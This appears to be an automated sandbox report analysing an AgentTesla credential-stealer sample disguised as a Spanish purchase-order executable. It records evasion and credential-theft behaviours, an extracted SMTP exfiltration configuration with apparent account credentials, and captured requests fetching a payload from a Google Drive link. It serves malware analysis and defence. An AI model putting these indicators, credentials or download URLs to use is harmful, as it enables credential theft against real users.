Windows Analysis Report LISTA DE PEDIDO DE COMPRA.exe

Overview

General Information

Sample Name: LISTA DE PEDIDO DE COMPRA.exe
Analysis ID: 1373
MD5: 943986d4cb51d4cc29946aa7914dbc5b
SHA1: cce8ec41fe0fabda407eaa5b8b9efc81168c5e5c
SHA256: 47d8b37351178ed6a40a269f3f42eb23fa0780a9a93098439275f7e66897a924

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected AgentTesla
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: RegAsm connects to smtp port
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Hides threads from debuggers
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
PE file does not import any functions
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Enables security privileges
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Found malware configuration
Source: conhost.exe.3480.30.memstrmin Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "murbano@reyesyasociados.com495QTi314mail.reyesyasociados.comnappiboioffice203@gmail.com"}
Multi AV Scanner detection for submitted file
Source: LISTA DE PEDIDO DE COMPRA.exe ReversingLabs: Detection: 15%

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1FEA33B8 CryptUnprotectData, 10_2_1FEA33B8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65795C1C4 CreateDirectoryW,FreeLibrary,DecryptFileW,FreeLibrary,FreeLibrary, 26_2_00007FF65795C1C4

Compliance:

Uses 32bit PE files
Source: LISTA DE PEDIDO DE COMPRA.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 142.250.185.174:443 -> 192.168.11.20:49768 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.184.193:443 -> 192.168.11.20:49770 version: TLS 1.2
Source: Binary string: MpSigStub.pdbGCTL source: mpam-1ba0cab.exe, 00000019.00000003.6149251039.0000020B4D841000.00000004.00000001.sdmp, MpSigStub.exe, 0000001A.00000002.6241664412.00007FF657987000.00000002.00020000.sdmp, MpSigStub.exe.25.dr
Source: Binary string: MpAdlStub.pdbGCTL source: mpam-1ba0cab.exe, 00000019.00000002.6244546959.00007FF7E3A9F000.00000002.00020000.sdmp
Source: Binary string: MpAdlStub.pdb source: mpam-1ba0cab.exe, 00000019.00000002.6244546959.00007FF7E3A9F000.00000002.00020000.sdmp
Source: Binary string: MpSigStub.pdb source: mpam-1ba0cab.exe, 00000019.00000003.6149251039.0000020B4D841000.00000004.00000001.sdmp, MpSigStub.exe, 0000001A.00000002.6241664412.00007FF657987000.00000002.00020000.sdmp, MpSigStub.exe.25.dr
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65795B030 FindNextFileW,FindClose,FindFirstFileW, 26_2_00007FF65795B030
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65795ADEC FindFirstFileW,FindNextFileW,FindClose,FindClose, 26_2_00007FF65795ADEC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65790F810 FindFirstFileW,FindNextFileW,FindClose,CloseHandle,CloseHandle, 26_2_00007FF65790F810
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF657982504 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 26_2_00007FF657982504

Networking:

JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1S2e4Rmu8PYtHWrTHvb17Qs1CjaoopuG3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0kmp839hage8unguv37m9lhvdkbnieei/1632762825000/00519186742208262786/*/1S2e4Rmu8PYtHWrTHvb17Qs1CjaoopuG3?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-50-docs.googleusercontent.comConnection: Keep-Alive
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: IOMART-ASGB IOMART-ASGB
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.11.20:49778 -> 109.169.39.245:587
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.11.20:49778 -> 109.169.39.245:587
Source: RegAsm.exe, 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: RegAsm.exe, 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmp String found in binary or memory: http://DXdVhu.com
Source: RegAsm.exe, 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmp String found in binary or memory: http://DynDns.comDynDNS
Source: RegAsm.exe, 0000000A.00000002.7779076026.0000000000DFC000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: RegAsm.exe, 0000000A.00000003.3217918693.0000000000E2F000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: RegAsm.exe, 0000000A.00000002.7799376587.000000001FD56000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: RegAsm.exe, 0000000A.00000002.7799692226.000000001FD93000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
Source: RegAsm.exe, 0000000A.00000003.3217918693.0000000000E2F000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: RegAsm.exe, 0000000A.00000002.7792807129.000000001DC2A000.00000004.00000001.sdmp String found in binary or memory: http://mail.reyesyasociados.com
Source: RegAsm.exe, 0000000A.00000002.7779076026.0000000000DFC000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: RegAsm.exe, 0000000A.00000002.7779076026.0000000000DFC000.00000004.00000020.sdmp String found in binary or memory: https://doc-0c-50-docs.googleusercontent.com/
Source: RegAsm.exe, 0000000A.00000003.3217918693.0000000000E2F000.00000004.00000001.sdmp String found in binary or memory: https://doc-0c-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0kmp839h
Source: RegAsm.exe, 0000000A.00000003.3217918693.0000000000E2F000.00000004.00000001.sdmp String found in binary or memory: https://doc-0c-50-docs.googleusercontent.com/om~;
Source: RegAsm.exe, 0000000A.00000002.7778539921.0000000000DBA000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/
Source: RegAsm.exe, 0000000A.00000002.7778539921.0000000000DBA000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1S2e4Rmu8PYtHWrTHvb17Qs1CjaoopuG3
Source: RegAsm.exe, 0000000A.00000002.7777894312.0000000000CB0000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1S2e4Rmu8PYtHWrTHvb17Qs1CjaoopuG3wininet.dllMozilla/5
Source: RegAsm.exe, 0000000A.00000002.7792195736.000000001DBBD000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000003.4120444145.0000000000EB1000.00000004.00000001.sdmp String found in binary or memory: https://f9WVaLZTFfU.com
Source: RegAsm.exe, 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.7791815811.000000001DB74000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/
Source: RegAsm.exe, 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com//
Source: RegAsm.exe, 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/https://login.live.com/
Source: RegAsm.exe, 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/v104
Source: RegAsm.exe, 0000000A.00000002.7799692226.000000001FD93000.00000004.00000001.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: RegAsm.exe, 0000000A.00000002.7791815811.000000001DB74000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: RegAsm.exe, 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1S2e4Rmu8PYtHWrTHvb17Qs1CjaoopuG3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0kmp839hage8unguv37m9lhvdkbnieei/1632762825000/00519186742208262786/*/1S2e4Rmu8PYtHWrTHvb17Qs1CjaoopuG3?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-50-docs.googleusercontent.comConnection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: RegAsm.exe, 0000000A.00000002.7792195736.000000001DBBD000.00000004.00000001.sdmp String found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"vis
itnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
Source: unknown HTTPS traffic detected: 142.250.185.174:443 -> 192.168.11.20:49768 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.184.193:443 -> 192.168.11.20:49770 version: TLS 1.2

System Summary:

Detected potential crypto function
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_0074C098 10_2_0074C098
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_00741130 10_2_00741130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_0074BA70 10_2_0074BA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_00743A50 10_2_00743A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_00744320 10_2_00744320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_0074C7D0 10_2_0074C7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_00743708 10_2_00743708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_007A0158 10_2_007A0158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_007A6988 10_2_007A6988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_007A1420 10_2_007A1420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_00A3C2AA 10_2_00A3C2AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_00D4D837 10_2_00D4D837
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_00D49180 10_2_00D49180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_00D44EB0 10_2_00D44EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_00D49BD0 10_2_00D49BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_00D444F8 10_2_00D444F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_00D43330 10_2_00D43330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1C9896C0 10_2_1C9896C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1C98E318 10_2_1C98E318
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1C982720 10_2_1C982720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1C983496 10_2_1C983496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1C9834B1 10_2_1C9834B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1C98340B 10_2_1C98340B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1C98357F 10_2_1C98357F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1C98368E 10_2_1C98368E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1C98361B 10_2_1C98361B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1C9833B7 10_2_1C9833B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1C98330A 10_2_1C98330A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1C983363 10_2_1C983363
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1D985E08 10_2_1D985E08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1D984ACC 10_2_1D984ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1D985DC3 10_2_1D985DC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1D986AF1 10_2_1D986AF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1FEA5FB8 10_2_1FEA5FB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1FEA4888 10_2_1FEA4888
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1FEA9700 10_2_1FEA9700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1FEAA468 10_2_1FEAA468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1FEA3FE8 10_2_1FEA3FE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1FEA7FF8 10_2_1FEA7FF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1FEA5BA0 10_2_1FEA5BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1FEAB8A8 10_2_1FEAB8A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1FEA4877 10_2_1FEA4877
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1FEA0040 10_2_1FEA0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1FEA0021 10_2_1FEA0021
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF6578F86BC 26_2_00007FF6578F86BC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF657903728 26_2_00007FF657903728
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65790D038 26_2_00007FF65790D038
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF6578FFF90 26_2_00007FF6578FFF90
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65793490C 26_2_00007FF65793490C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65796B88C 26_2_00007FF65796B88C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65791A818 26_2_00007FF65791A818
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF6579777FC 26_2_00007FF6579777FC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65795F76C 26_2_00007FF65795F76C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF6579215F8 26_2_00007FF6579215F8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF657967600 26_2_00007FF657967600
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF6579834D4 26_2_00007FF6579834D4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF657969520 26_2_00007FF657969520
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65791C52C 26_2_00007FF65791C52C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF657982504 26_2_00007FF657982504
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF657926480 26_2_00007FF657926480
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF657972480 26_2_00007FF657972480
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF6578F1420 26_2_00007FF6578F1420
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65795E410 26_2_00007FF65795E410
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65797837C 26_2_00007FF65797837C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF657920320 26_2_00007FF657920320
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF657919278 26_2_00007FF657919278
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65793A288 26_2_00007FF65793A288
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65796C21C 26_2_00007FF65796C21C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65791B20C 26_2_00007FF65791B20C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF6578FB0C8 26_2_00007FF6578FB0C8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF657967108 26_2_00007FF657967108
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65796D058 26_2_00007FF65796D058
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65797B058 26_2_00007FF65797B058
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF657957050 26_2_00007FF657957050
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65790EFCC 26_2_00007FF65790EFCC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65792502C 26_2_00007FF65792502C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65796C034 26_2_00007FF65796C034
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF657975F9C 26_2_00007FF657975F9C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65791FFA8 26_2_00007FF65791FFA8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65790DFB4 26_2_00007FF65790DFB4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF657901FA8 26_2_00007FF657901FA8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF657955ED0 26_2_00007FF657955ED0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF65796BE48 26_2_00007FF65796BE48
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe Code function: 26_2_00007FF657952DD4 26_2_00007FF657952DD4
